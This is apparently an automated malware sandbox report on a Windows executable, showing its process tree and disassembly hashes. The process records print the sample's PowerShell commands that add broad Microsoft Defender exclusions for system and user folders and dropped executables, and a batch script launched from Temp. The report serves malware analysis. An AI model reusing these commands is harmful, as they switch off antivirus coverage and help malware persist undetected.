                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:47
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:48
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:49
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:50
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:51
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:52
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:53
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:54
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:55
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:56
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:57
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:58
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:59
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:60
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:61
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:62
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:63
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:64
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:65
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:66
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:67
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:68
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:69
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:70
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:71
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:72
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:73
                                              Start time:14:17:08
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Imagebase:0xfa0000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:74
                                              Start time:14:17:09
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Imagebase:0x250000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:75
                                              Start time:14:17:09
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
                                              Imagebase:0x7ff6fce80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:76
                                              Start time:14:17:09
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:77
                                              Start time:14:17:13
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\chcp.com
                                              Wow64 process (32bit):false
                                              Commandline:chcp 65001
                                              Imagebase:0x7ff6ecd60000
                                              File size:14'848 bytes
                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:79
                                              Start time:14:17:18
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\w32tm.exe
                                              Wow64 process (32bit):false
                                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              Imagebase:0x7ff6399d0000
                                              File size:108'032 bytes
                                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFAACF1954F Relevance: .7, Instructions: 739COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e03d258f8ec70de39b8056aa9f3c84971662f33148b4eaceac20a8633cb6987e
                                                • Instruction ID: db5ac77a2f61296f6d561958e971cb34e278c6a10ea2b943a52bd6f61823c380
                                                • Opcode Fuzzy Hash: e03d258f8ec70de39b8056aa9f3c84971662f33148b4eaceac20a8633cb6987e
                                                • Instruction Fuzzy Hash: 8352AC70919649CFEB5CCF28C4A46B87BA1FF59300F5081BDD54EC7286CA38EA85CB91
                                                Function 00007FFAACB20D78 Relevance: .2, Instructions: 250COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83c5e3c4552bf422a2d54d8fde0e616fc38edd82ea0abb4a96883f7fde4d5ff3
                                                • Instruction ID: 611f2b244ad9ded5c8040ea206c49b45ae45ef6f0db90b7643b4c971f1758b23
                                                • Opcode Fuzzy Hash: 83c5e3c4552bf422a2d54d8fde0e616fc38edd82ea0abb4a96883f7fde4d5ff3
                                                • Instruction Fuzzy Hash: F591B0B1918A998FE789DF68C8697A9BFE1EF96310F00407EE14DD72A6DB741805C780
                                                Function 00007FFAACF13EB2 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 283ddc4169d1b7c42bcee1620d944c6ea5f5efb000e5417b669736345713ec69
                                                • Instruction ID: b5f7a68ade192a1a065240bfe9d4619b90871049a1ed63cc075266fdf02f42e6
                                                • Opcode Fuzzy Hash: 283ddc4169d1b7c42bcee1620d944c6ea5f5efb000e5417b669736345713ec69
                                                • Instruction Fuzzy Hash: D3517C71D0964ACFEB49DBA8C4555FCBBB1EF45300F1080BDD51EA7292DB39A909CBA0
                                                Function 00007FFAACF192D8 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 6bb4602a0ab88b5f2a13cc2c6a08f48e09fba66fb41aac5265d6af748369d7b0
                                                • Instruction ID: d26ee400f99e70b9ce50f041930fd7d3f82bae4b0ce2cb034f0774f774610c37
                                                • Opcode Fuzzy Hash: 6bb4602a0ab88b5f2a13cc2c6a08f48e09fba66fb41aac5265d6af748369d7b0
                                                • Instruction Fuzzy Hash: 6E514970D0965EDFEB49DBA8C4515FCB7B1EF49300F5481B9D10EA7292CA34AA09CBE1
                                                Function 00007FFAACF1E118 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: fdc6bd880a7887c9b206fc9f0d2d72655d58f4024b15fdb608c1277821c78992
                                                • Instruction ID: 17f9f460743c7ca3892ee72c33fe9a56993ffb0ef6cd0a454c3e6f04c986131b
                                                • Opcode Fuzzy Hash: fdc6bd880a7887c9b206fc9f0d2d72655d58f4024b15fdb608c1277821c78992
                                                • Instruction Fuzzy Hash: 2C517370D0964ACFEB49CBA8C4695BDBBB1FF45300F1481BDD11EE7286CA346909CBA0
                                                Function 00007FFAACF11E40 Relevance: .7, Instructions: 688COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e46e978995efcbe2180a018fcbb729c1e46f3adaa246807a173b6d2fa5ef28e
                                                • Instruction ID: 7169138306b4ca535265d7af377ceb9016fa9894ecfc775ad51e582e7f7ded5e
                                                • Opcode Fuzzy Hash: 5e46e978995efcbe2180a018fcbb729c1e46f3adaa246807a173b6d2fa5ef28e
                                                • Instruction Fuzzy Hash: AA329430A19B59CFEB98DB58C895A6C77E2FF55310F1081B9D14EC7292DB24EC49CB90
                                                Function 00007FFAACF1E38F Relevance: .4, Instructions: 439COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f13ebb09ca2c93f0179e73861ec54a1afaa7c7f7833451dde1f490cdb5037a44
                                                • Instruction ID: 3455b11c438bb6c31209b71ce9eeb8b8cd21714d0a4bf702020cbce70586b73e
                                                • Opcode Fuzzy Hash: f13ebb09ca2c93f0179e73861ec54a1afaa7c7f7833451dde1f490cdb5037a44
                                                • Instruction Fuzzy Hash: 99F1F430519645CFFB49CF28C4E45B83BA0FF46310B5486BDD95E8B68BCA38E885CB91
                                                Function 00007FFAACF1A591 Relevance: .4, Instructions: 415COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c45a9246688e42d51c48651a4811b724a32df4b7e02a3f7036044c7b2f50dda
                                                • Instruction ID: 91c531f0b776cf6bcca6557a537d1039731e268b66e9e7a8b0c6a4567eeef86c
                                                • Opcode Fuzzy Hash: 2c45a9246688e42d51c48651a4811b724a32df4b7e02a3f7036044c7b2f50dda
                                                • Instruction Fuzzy Hash: 55D1DD7090EB068FF369DB38D49157977E0FF46310B24857EC58E83682DA29F84A87A1
                                                Function 00007FFAACF15161 Relevance: .4, Instructions: 410COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61c9c1fb07d2076bb553dd895aaa4d6d72fa23ab5feb457957090f35f2a81d1f
                                                • Instruction ID: 37bd839445b7dff396945b51c05c41985541f750720b67cfb9001bf50d4e56db
                                                • Opcode Fuzzy Hash: 61c9c1fb07d2076bb553dd895aaa4d6d72fa23ab5feb457957090f35f2a81d1f
                                                • Instruction Fuzzy Hash: 84D1017091EB46CFFB68DB28D49117977A1FF46300F20857EC18E83682DA69F80A8791
                                                Function 00007FFAACF1956F Relevance: .3, Instructions: 335COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6df79ca78a2b6491cdbd03671ee72821fc5c11a639ba63bbde00c08d5d1d2462
                                                • Instruction ID: 246e99cdd782932a89f5f277d33e8d2cf3d13a3616d47b7ab90b73b8d2629362
                                                • Opcode Fuzzy Hash: 6df79ca78a2b6491cdbd03671ee72821fc5c11a639ba63bbde00c08d5d1d2462
                                                • Instruction Fuzzy Hash: 21C1BF7051A646CBFB0DCF28C0D05B937A1FF46310B9485BDD94E8B68ACA38E985CBD1
                                                Function 00007FFAACF1E3AF Relevance: .3, Instructions: 335COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b950a236ff7b789c6f658c906f71d9698400cc35e6c8bc7cb4705bf428ccef6a
                                                • Instruction ID: 93a91197f7cd2faca7ac29c0fe70dbe13969f69ea4ab232cfeddae0ea2c370a7
                                                • Opcode Fuzzy Hash: b950a236ff7b789c6f658c906f71d9698400cc35e6c8bc7cb4705bf428ccef6a
                                                • Instruction Fuzzy Hash: 56C1C430519646CBFB0DCF24C0E45B93BA1FF46310B5486BDD9AE8B58FD628E885CB91
                                                Function 00007FFAACF18E02 Relevance: .3, Instructions: 327COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66d2269a25c31c0704b43fa4769ace156ca0730ba00f8e073ca87b082dcebe5b
                                                • Instruction ID: e215ee1973e65d6dc3799e26c9f5bc8a2abb7f2b4f306343ff8b516bc86e5fd1
                                                • Opcode Fuzzy Hash: 66d2269a25c31c0704b43fa4769ace156ca0730ba00f8e073ca87b082dcebe5b
                                                • Instruction Fuzzy Hash: 0FC1C070A1DA468FE749DB38C0916A8BBE1FF5A300F548179C14EC7A86CB29F955C7E0
                                                Function 00007FFAACF1DC9A Relevance: .3, Instructions: 306COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0276e077a13564aa860cfec7468766713f569971262d3ef35b9e8f991529d66e
                                                • Instruction ID: c65ee52aba7696a4caf443edc1f2de75ac3890e4d6b8216abe80709864580059
                                                • Opcode Fuzzy Hash: 0276e077a13564aa860cfec7468766713f569971262d3ef35b9e8f991529d66e
                                                • Instruction Fuzzy Hash: F4B1E57051EB868FE74ADB38C0956A8B7A0FF56300F4481B9C14ECBA86DB24F855C7D1
                                                Function 00007FFAACF167FC Relevance: .3, Instructions: 303COMMON
                                                Download Yara Rule
                                                Memory Dump Source
